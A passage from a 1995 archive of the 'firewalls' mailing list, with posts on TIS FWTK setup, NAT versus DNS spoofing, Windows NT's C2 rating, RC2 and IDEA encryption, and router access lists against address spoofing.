to the information it generates. To build your firewall, look into FWTK from Trusted Information Systems; URL=ftp://ftp.tis.com/pub/firewalls/toolkit PS: All of this is free! :) Best Regards, S. Lane Pierce lpierce@intex.net From firewalls-owner Tue Oct 10 10:22:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA23050 for firewalls-outgoing; Tue, 10 Oct 1995 09:51:20 -0700 Received: from sun1 (sun1.summitec.com [199.29.52.222]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA23037 for ; Tue, 10 Oct 1995 09:51:16 -0700 Received: by sun1 (5.x/SMI-SVR4) id AA02835; Tue, 10 Oct 1995 12:48:35 -0400 Date: Tue, 10 Oct 1995 12:48:35 -0400 From: chen@summitec.com (Arthur Chen) Message-Id: <9510101648.AA02835@sun1> To: firewalls@greatcircle.com, Tham.Huei.Hwan@bass.com.my Subject: Re: TIS 1.3 tn-gw configuration Cc: fwtk-users@TIS.COM X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Check to see if you had properly added an entry for authsrv in the inetd.conf and services two files. They are under /etc. Arthur Chen chen@summitec.com From firewalls-owner Tue Oct 10 10:51:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA22901 for firewalls-outgoing; Tue, 10 Oct 1995 09:47:30 -0700 Received: from rds.com (wpgate.rds.com [206.54.49.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA22888 for ; Tue, 10 Oct 1995 09:47:26 -0700 Received: from RDS-Message_Server by rds.com with Novell_GroupWise; Tue, 10 Oct 1995 09:40:05 -0700 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 10 Oct 1995 09:47:05 -0700 From: Doug Kaye To: avalon@coombs.anu.edu.au, Firewalls@GreatCircle.COM Subject: Private insecure networks... -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It's real, Darren. Here in the states it's slated for rollout the first quarter of 1996. I think the big push is for IPX rather than IP, but that may have shifted. As your sources mentioned, it's all based upon NDS. NetWare today supports a number of token-based and one-time password schemes, and as you say, I would hope users of this net will plan on using them. ...doug ============================================================ Doug Kaye Rational Data Systems, Novato, CA Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com >>> Darren Reed 10/10/95 06:42am >>> An article in a local paper today described the local Telco's desire to setup a "private" international version of the Internet, for business only. It is currently known as "Netware Connect Services" (NCS). Does anyone have any more details ? Is this just more newspaper trash ? From firewalls-owner Tue Oct 10 11:10:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA25270 for firewalls-outgoing; Tue, 10 Oct 1995 10:49:10 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA25262 for ; Tue, 10 Oct 1995 10:49:07 -0700 Date: Tue, 10 Oct 1995 13:47:13 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951010134713.21056023@hobbes.orl.mmc.com> Subject: Windows NT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At the NIST/NSA/NCSC conference it was announced that Windows NT has met C2 requirements and may display the logo on its packages. The "Administrator's Security Guide" lists configurations for Compaq ProLiant 2000 & 4000 & DECpc AXP/150. *None* of the configurations include a network interface card (am assured that that will be included RSN (4-6 months est.)). Of course *today* adding any peripheral invalidates the certification so you can use NT to set up an C2 compliant server. Just don't connect it to a network. Warmly, Padgett From firewalls-owner Tue Oct 10 11:32:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA26436 for firewalls-outgoing; Tue, 10 Oct 1995 11:29:46 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA26429 for ; Tue, 10 Oct 1995 11:29:43 -0700 Received: from translation.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id LAA16030; Tue, 10 Oct 1995 11:20:25 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id LAA08285; Tue, 10 Oct 1995 11:25:46 -0700 Date: Tue, 10 Oct 1995 11:25:46 -0700 Message-Id: <199510101825.LAA08285@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma008281; Tue Oct 10 11:25:00 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Paul A Vixie , firewalls@GreatCircle.COM From: Andrew Foss Subject: Re: Network Address Translation stuff Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Assume that the name server is smart enough to answer "creatively" when asked >certain questions by internal hosts about external hosts. The border gateway This is generally referred to as DNS spoofing not network address translation. DNS spoofing does save many people a lot of socks and proxy admin work, but it is not true address translation. andrew Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Tue Oct 10 11:42:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA26779 for firewalls-outgoing; Tue, 10 Oct 1995 11:39:43 -0700 Received: from ix2.ix.netcom.com (ix2.ix.netcom.com [199.182.120.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA26772 for ; Tue, 10 Oct 1995 11:39:39 -0700 Received: from by ix2.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id LAA19278; Tue, 10 Oct 1995 11:38:05 -0700 Date: Tue, 10 Oct 1995 11:38:05 -0700 Message-Id: <199510101838.LAA19278@ix2.ix.netcom.com> From: raberry2@ix.netcom.com (Ron Berry ) Subject: International Encryption Protocols (RC2) or (IDEA) To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk During recent firewall presentations discussions were introduced regarding encryption algorithms for E:mail and other messaging. We discussed RSA and DES, which are standards accepted by the orgainization I work for. In addition several business units have defined requirements where E:mail correspondence will be used on an international basis. One vendor supports RC2 for the standard international encryption algorithm. I know little about RC2 and was hoping someone could shed some light on this for me. What is the definition of the acronym; What key lentgh is it based on; Who or what orgainization is responsible for it (who designedit); is it widely used??? Thanks....Ron From firewalls-owner Tue Oct 10 12:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA27348 for firewalls-outgoing; Tue, 10 Oct 1995 11:53:14 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA27337 for ; Tue, 10 Oct 1995 11:53:07 -0700 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma029586; Tue Oct 10 14:50:03 1995 Posted-Date: Tue, 10 Oct 1995 14:49:58 -0400 From: "Bryan D. Boyle" Message-Id: <9510101449.ZM7571@maverick.erenj.com> Date: Tue, 10 Oct 1995 14:49:58 -0400 In-Reply-To: "A. Padgett Peterson, P.E. Information Security" "Windows NT" (Oct 10, 1:47pm) References: <951010134713.21056023@hobbes.orl.mmc.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: "A. Padgett Peterson, P.E. Information Security" Subject: Re: Windows NT Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Oct 10, 1:47pm, A. Padgett Peterson, P.E. Information Security wrote: *****deletia****** > *None* of the configurations include a network interface card (am assured > that that will be included RSN (4-6 months est.)). Of course *today* adding > any peripheral invalidates the certification so you can use NT to set up an > C2 compliant server. Just don't connect it to a network. hey, if you don't connect any server to a network, it will be secure. Usefulness, however, is another kettle of fish...:) -- Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 | PAGE: bboyle@apt1.pagemart.com #include | http://www.access.digex.net/~bdboyle/index.html "It seems that 'national security' is the root password to the Constitution. As with any dishonest superuser, the best countermeasure is strong encryption." -Phil Karn From firewalls-owner Tue Oct 10 12:31:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA28640 for firewalls-outgoing; Tue, 10 Oct 1995 12:22:29 -0700 Received: from netmail2.microsoft.com (netmail2.microsoft.com [131.107.1.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA28633 for ; Tue, 10 Oct 1995 12:22:23 -0700 Received: by netmail2.microsoft.com (5.65/25-eef) id AA28475; Tue, 10 Oct 95 13:24:56 -0700 Received: by netmail2 using fxenixd 1.0 Tue, 10 Oct 95 13:24:55 PDT X-Received: from chopper by xmtp2 with recvsmtp; Tue, 10 Oct 1995 11:39:45 -0700 Received: by chopper.microsoft.com with Microsoft Exchange id <01BA9700.873A0270@chopper.microsoft.com>; Tue, 10 Oct 1995 11:07:03 -0700 Message-Id: From: "Greg King (Exchange)" To: "firewalls@GREATCIRCLE.COM" , "Wilner@DOCKMASTER.NCSC.MIL" Subject: RE: Re: B2 rated WIndows NT? Date: Tue, 10 Oct 1995 11:06:51 -0700 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-Msxmtid: xmtp2951010183945RECVSMTP[01.51.00]000000d4-732 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This summer we passed a C2 security evaluation. We have no current = plans to evaluate as a B level product ourselves. We have a number of = third parties investigating doing this work, but nothing is currently = pending. >>> ---------- From: Wilner@DOCKMASTER.NCSC.MIL[SMTP:Wilner@DOCKMASTER.NCSC.MIL] Sent: Monday, October 09, 1995 4:42 PM To: firewalls@GREATCIRCLE.COM Subject: Re: B2 rated WIndows NT? > It's said that there is a [B2-secure Windows NT] available. > Does any one know where can I get more information about that? Don't believe it. Microsoft has neither the inclination nor the experience to satisfy the rigorous design and documentation requirements to merit such a rating. >>> Not true in either counts. Greg King Microsoft Corp. BackOffice Capacity Planning Manager I have certainly heard many, many stories about Microsoft's forays into the world of trusted computing. I have not seen any evidence personally. The best POC that I know of at this time is Ken Moss, 206-936-7774. Come to think of it, the area code may have changed to 360. From firewalls-owner Tue Oct 10 12:45:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA28864 for firewalls-outgoing; Tue, 10 Oct 1995 12:29:12 -0700 Received: from services ([168.166.0.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA28857 for ; Tue, 10 Oct 1995 12:29:08 -0700 Received: from services by services (SMI-8.6/SMI-SVR4) id OAA28987; Tue, 10 Oct 1995 14:28:55 -0500 Date: Tue, 10 Oct 1995 14:28:53 -0500 (CDT) From: "Frank K. Senter" X-Sender: fsenter@services To: Paul A Vixie cc: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff In-Reply-To: <9510061801.AA28453@wisdom.home.vix.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What sort of "border gateways" keep track of relative time between requests for external DNS info and connection attempts to external sites? What's an "explicit proxy"? Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. Box 270 Jefferson City MO 65102 On Fri, 6 Oct 1995, Paul A Vixie wrote: > In private e-mail, someone quoted me and then asked a question which I have > decided to answer here: > [Phwwit] > > Some of the assumptions, especially the tight binding between DNS replies and > remote server identities, are unpleasantly constraining. I observe that this > situation is only encountered by clients who don't know about explicit proxies, > and as such, most of the user population won't have to suffer with it. Older > and dumber clients _do_ work, though. And the benefits of using an RFC 1597 > network are just extreme: no renumbering when switching carriers; multihoming > for free; absolute packet-level security no matter who misconfigures what. > From firewalls-owner Tue Oct 10 13:01:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA28684 for firewalls-outgoing; Tue, 10 Oct 1995 12:24:05 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA28674 for ; Tue, 10 Oct 1995 12:23:59 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id MAA08517; Tue, 10 Oct 1995 12:21:47 -0700 Date: Tue, 10 Oct 1995 12:21:47 -0700 Message-Id: <199510101921.MAA08517@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma008511; Tue Oct 10 12:21:25 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: boone@isc.upenn.edu (Jon 'tex' Boone), lasseh@microfront.se, Firewalls@GreatCircle.COM From: Andrew Foss Subject: Re: Address Translators Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Re: Jon 'tex' Boone's descriptions of the PIX: > I'm glad that you brought this up. I have done an evaluation of this >product and have some criticisms of how it works. > > 1) The version I looked at did not support MTU discovery [according to >the guy who wrote the code.] This meant overall poor performance since >everywhere that I was trying to go to through the PIX was "off-net" and >required a 512-byte MTU. :-( UNTRUE, the PIX is transparent. MTU discovery is an issue that proxies deal with, the PIX on the other hand has NO bearing on MTU! > > 2) The box will map your address into a new range dynamically and does so >well - however, you must already be numbered in a reserved range if you >want to have "global" connectivity. For example, if you have already set up >your network [net 20.0.0.0, say] and you want to use this box to dynamically >map you into your provider's space, you need to renumber into the reserved >net 10.0.0.0 space if you want to be able to reach the site that is going to >be legitimately using net 20.0.0.0. Most people who choose to continue to use other peoples addresses, merely add static routes to the publicly accessable systems they may need to get to in the overlapped address space. You also need to be sure those numbers don't occur internally. For example 20.0.0.0 belongs to CSC, they have a web site at 20.1.10.127. Don't use 20.1.10.127 and provide a static route to that network if you really need to contact it! In fact, many of the Class A owners prefer to dedicate a Class C to their public machines anyway! Nonetheless, if you have the option 10.0.0.0 is a better choice! Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Tue Oct 10 13:31:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA00140 for firewalls-outgoing; Tue, 10 Oct 1995 13:11:37 -0700 Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA00130 for ; Tue, 10 Oct 1995 13:11:33 -0700 Received: from dtw-8.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) for id QAA14260; Tue, 10 Oct 1995 16:23:08 -0700 Date: Tue, 10 Oct 1995 16:23:08 -0700 Message-Id: <199510102323.QAA14260@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: janken@rust.net (Kenneth J. Stephens) Subject: Firewall Market Stats (sort of) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I just received the latest Computer Security Institute (CSI) INTERNET Survey results in todays mail. It has a breakdown of what firewall products the respondents use. It is copyrighted so I won't publish here. Contact them at: Computer Security Institute 600 Harrison St. San Francisco, CA 94107 (415) 905-2626 Ken. [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Tue Oct 10 13:43:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA01423 for firewalls-outgoing; Tue, 10 Oct 1995 13:40:42 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA01415 for ; Tue, 10 Oct 1995 13:40:39 -0700 Received: from leonardo.bwh.harvard.edu (leonardo.bwh.harvard.edu [134.174.81.232]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id QAA07077; Tue, 10 Oct 1995 16:38:45 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: (adam@localhost) by leonardo.bwh.harvard.edu (8.6.9/8.6.4) id QAA14326; Tue, 10 Oct 1995 16:38:44 -0400 Message-Id: <199510102038.QAA14326@leonardo.bwh.harvard.edu> Subject: Re: An interesting dilema that I could use help with To: daveyb@iagi.net (David A. Baldwin) Date: Tue, 10 Oct 1995 16:38:43 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "David A. Baldwin" at Oct 6, 95 03:57:24 pm X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1093 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk David A. Baldwin wrote: | We have a few Xylogics Annex 3 terminal servers at We would like to place | a firewall between the Terminal server and the boot/security server. The | firewall package that we use is Raptor's firewall product. Since this is turning out to be difficult, why not put a bastion host that handles only boot management next to the annex? People can attack your boot server through the dialups, but since thats a one function box, it can be tied down very tightly, with a bit of read only disk, so it may be safe enough. People can't get from your dialups to the Internet or your private networks without authenticating through the firewall, which we'll hope uses strong authentication. (I'm not the ascii artist you are, but-- ------------------------ | | | | | + terminal boot firewall +---------- Internet server server - pc | | private network -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Oct 10 14:12:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA00554 for firewalls-outgoing; Tue, 10 Oct 1995 13:28:21 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA00547 for ; Tue, 10 Oct 1995 13:28:18 -0700 Received: from leonardo.bwh.harvard.edu (leonardo.bwh.harvard.edu [134.174.81.232]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id QAA06946; Tue, 10 Oct 1995 16:26:25 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: (adam@localhost) by leonardo.bwh.harvard.edu (8.6.9/8.6.4) id QAA14248; Tue, 10 Oct 1995 16:26:23 -0400 Message-Id: <199510102026.QAA14248@leonardo.bwh.harvard.edu> Subject: Re: International Encryption Protocols (RC2) or (IDEA) To: raberry2@ix.netcom.com (Ron Berry) Date: Tue, 10 Oct 1995 16:26:23 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199510101838.LAA19278@ix2.ix.netcom.com> from "Ron Berry" at Oct 10, 95 11:38:05 am X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1568 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ron Berry wrote: | international basis. One vendor supports RC2 for the standard | international encryption algorithm. I know little about RC2 and was | hoping someone could shed some light on this for me. What is the | definition of the acronym; What key lentgh is it based on; Who or what | orgainization is responsible for it (who designedit); is it widely | used??? RC2 is a trade secret of RSADSI. RC probably stands for 'Ron's Code,' after the author, Ron Rivest. It is not widely used, as it is slower than RC4, and until recently, there was no way of knowing which of the two algorithims is stronger. Thus, people using RSA technology tended to use RC4 instead. If an encryption algorithim can be exported from the United States, it is, by law, quite weak. I would urge that you look at buying your encryption technology outside of the US for worldwide delpoyment. IDEA is a relatively new cryptosystem, but it has been subjected to a fair amount of scrutiny, and it seems to resist most attacks well. RC2, being private, has not been subjected to anything like the same kind of scrutiny. I would suggest using IDEA or 3DES as your main bulk cryptosystem. For an excellent introduction to cryptography, read Bruce Schneier's Applied Cryptography. Any good technical library should have it. (I'd put off buying a copy; the much expanded second edition should be out soon.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Oct 10 15:17:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA05606 for firewalls-outgoing; Tue, 10 Oct 1995 15:10:55 -0700 Received: from vger.tripcom.com (vger.tripcom.com [198.5.220.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA05599 for ; Tue, 10 Oct 1995 15:10:49 -0700 Received: (from adam@localhost) by vger.tripcom.com (8.6.12/8.6.12) id RAA14884 for firewalls@greatcircle.com; Tue, 10 Oct 1995 17:08:44 -0500 From: Adam Horwitz Message-Id: <199510102208.RAA14884@vger.tripcom.com> Subject: Re: Firewall Market Stats (sort of) To: firewalls@greatcircle.com Date: Tue, 10 Oct 1995 17:08:43 -0500 (CDT) In-Reply-To: <199510102323.QAA14260@Fe3.rust.net> from "Kenneth J. Stephens" at Oct 10, 95 04:23:08 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I just received the latest Computer Security Institute (CSI) INTERNET Survey > results in todays mail. It has a breakdown of what firewall products the > respondents use. Interesting how that graph appears. I really have to quesiton the accuracy of the information. Partly because the list is neither in alphabetical nor rank order, and partly because the numbers just don't look right to me. -- Adam Horwitz (708) 778-9531 Tripcom Systems Inc. adam@tripcom.com From firewalls-owner Tue Oct 10 15:30:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA05461 for firewalls-outgoing; Tue, 10 Oct 1995 15:09:00 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA05447 for ; Tue, 10 Oct 1995 15:08:54 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA01230; Wed, 11 Oct 1995 08:01:51 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma001224; Wed Oct 11 08:01:34 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA03777; Wed, 11 Oct 1995 08:07:39 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510102207.AA03777@citecub.citec.qld.gov.au> Subject: Re: IP seq. number attacks To: serge@freelunch.freenet.kiev.ua (Sergey Zhuk) Date: Wed, 11 Oct 95 8:07:39 EST Cc: Firewalls@GreatCircle.COM In-Reply-To: ; from "Sergey Zhuk" at Oct 10, 95 2:10 pm X-Mailer: ELM [version 2.3 PL11] content-length: 2254 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, With the setup you have, there is no real reason that I can see to exchange routing information with your provider. You can both live with static routes. You set the default route on your router to be his router. That way you can always get out. He sets a static route to your router on his. There probably isn't even any reason for the ISP to use dynamic routes since he probably only has one connection to another router. Colin > > hi > > i'm using extended access list filters on external interfaces to prevent subj. > But it's still one problem: if you have addr. from _your_ subnet addr. on > remote end (your providers' router) you should permit packets from this > address, which are coming from external (for your network) interface. > This is true at least when i'm exchanging routing information with that host: > > ------I2 ------------ > R1 |--------| R external|------Internet > ----- ----------- > |I1 > | > ---- > LAN| > --- > > R1 - router for my site > R external - router of my provider > I1 - internal (LAN) interface > I2 - external interface. > > Suppose I2 has IP addr: xx.xx.xx.128 netmask 255.255.255.224 and > I2 on R external has IP addr: xx.xx.xx.129 netmask 255.255.255.224, > I1 has IP addr: xx.xx.xx.69 netmask 255.255.255.224. > So i have different subnets of network xx.xx.xx.0, assigned to diff. > interfaces. > > I can prevent incoming packets from R external with source address > xx.xx.xx.0 0.0.0.255 any > but i should permit > xx.xx.xx.129 0.0.0.0 > thus permitting subj. from at least one address. > Sure that's better than subj from any of 254 addresses, but what a hell ;). > > Any suggestions ? > > Another thing: ICMP redirects, whom i can trust and how to setup properly > access list for this. I've found at least 3 types of ICMP redirects > mentioned in CISCO docs... > > rgds, > serge > > -- > +-------------------------------------+-------------------------------------+ > | Sergey Zhuk | serge@freenet.kiev.ua | > | UN Internet Project | +380-44-228-6393 | > | System and Network Administrator | www.freenet.kiev.ua, www.un.kiev.ua | > +-------------------------------------+-------------------------------------+ > From firewalls-owner Tue Oct 10 15:42:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA05921 for firewalls-outgoing; Tue, 10 Oct 1995 15:19:00 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA05914 for ; Tue, 10 Oct 1995 15:18:57 -0700 Received: by gw.home.vix.com id AA09600; Tue, 10 Oct 95 15:17:04 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA30889; Tue, 10 Oct 1995 15:17:03 -0700 Message-Id: <9510102217.AA30889@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff In-Reply-To: Your message of "Mon, 09 Oct 1995 17:17:12 EDT." <199510092117.RAA03630@bramber.windsor.com> Date: Tue, 10 Oct 1995 15:17:03 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First: [smith] > Doesn't this assume that the smart DNS server knows which of these > protocols is being requested for each address, so that it knows which > proxy to start up on the socket it created? Or am I missing something? [vixie] > yes, or it requires a kernel with a preemptive icmp socket. [smith] > Sorry, I didn't make my question obvious. How does the DNS > server know if a request for the name foo.bar.com is for > FTP, telnet, finger, or whatever? I assume it could tell > SMTP by an MX request, but what about the others? There's a socket you can open in modern BSD kernels that tells you about all the ICMP errors received or generated by the local host. If you do a little bit of kernel work you can make this socket preemptive, that is, arrange for it to be the endpoint of locally generated events rather than merely a notification that such were sent. When one is about to be sent, you can see if it's for an address you're proxying for, and if it is you open a listener for the appropriate port and tell the kernel to retry; otherwise you send the ICMP out so the remote connectee hears about it. Naturally you need source code for this. Linux, BSD/OS, FreeBSD, NetBSD all provide it. Solaris, Digital UNIX, HP-UX, and so on do not. And you will need some expertise, which you can grow locally or buy from outside. If you don't have the expertise to do it, you probably want to buy the whole technology suite from someone else, such as our next contestant, who works for "Network Translation Inc.": [vixie] > Assume that the name server is smart enough to answer "creatively" when > asked certain questions by internal hosts about external hosts. [...] [foss] > This is generally referred to as DNS spoofing not network address > translation. DNS spoofing does save many people a lot of socks and proxy > admin work, but it is not true address translation. In the case of FTP, I feel that DNS spoofing is better than NAT. For that matter, any protocol which encodes and encapsulates endpoint addresses should be spoofed rather than translated -- that's my story, and I'm sticking to it; your mileage may vary, void where prohibited, and please don't expect me to argue with you about it. You're right that it's not NAT and I regret that I didn't point out this subtle difference in terminology. Finally: [vixie] > Some of the assumptions, especially the tight binding between DNS replies > and remote server identities, are unpleasantly constraining. I observe > that this situation is only encountered by clients who don't know about > explicit proxies, and as such, most of the user population won't have to > suffer with it. Older and dumber clients _do_ work, though. And the > benefits of using an RFC 1597 network are just extreme: no renumbering when > switching carriers; multihoming for free; absolute packet-level security no > matter who misconfigures what. [senter] > What sort of "border gateways" keep track of relative time between > requests for external DNS info and connection attempts to external sites? I must be really slow today, I thought I was just describing the sort of "border gateway" that keeps track of the relative time between requests for external DNS info and connection attempts to external sites. As far as I know there's no shrinkwrapped product that does this -- today. [senter] > What's an "explicit proxy"? Something like socks, or the TIS ftp-gw, or a proxy httpd. Anything that requires the client to act differently when speaking to it is an "explicit" proxy. Anything that requires no changes, awareness or context in the client is an "implicit" proxy. "Implicit" is better overall, since you can't always change the client. "Explicit" is better as a point solution where you have control over all aspects of the design and you want to avoid any added costs from spoofing (sometimes an implicit proxy has to maintain invariants that don't matter in every connection, and this can cost you in performance.) I had no idea that this discussion would go on so long. As before, I am not on the firewalls mailing list, so if you want me to see your reply, CC me. Paul Vixie La Honda, CA "Illegitimi non carborundum." pacbell!vixie!paul (dont let the bastards grind you down) From firewalls-owner Tue Oct 10 16:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA06971 for firewalls-outgoing; Tue, 10 Oct 1995 15:50:00 -0700 Received: from border.com (mail.border.com [199.71.190.98]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA06964 for ; Tue, 10 Oct 1995 15:49:53 -0700 Received: by janus.border.com id <4998>; Tue, 10 Oct 1995 18:49:40 -0400 To: Rick Smith Cc: firewalls@greatcircle.com, glenn@border.com Subject: Re: Borderware (was: Information, We want information) From: "Gene Amdur" Date: Tue, 10 Oct 1995 18:47:20 -0400 Message-Id: <95Oct10.184940edt.4998@janus.border.com> Sender: 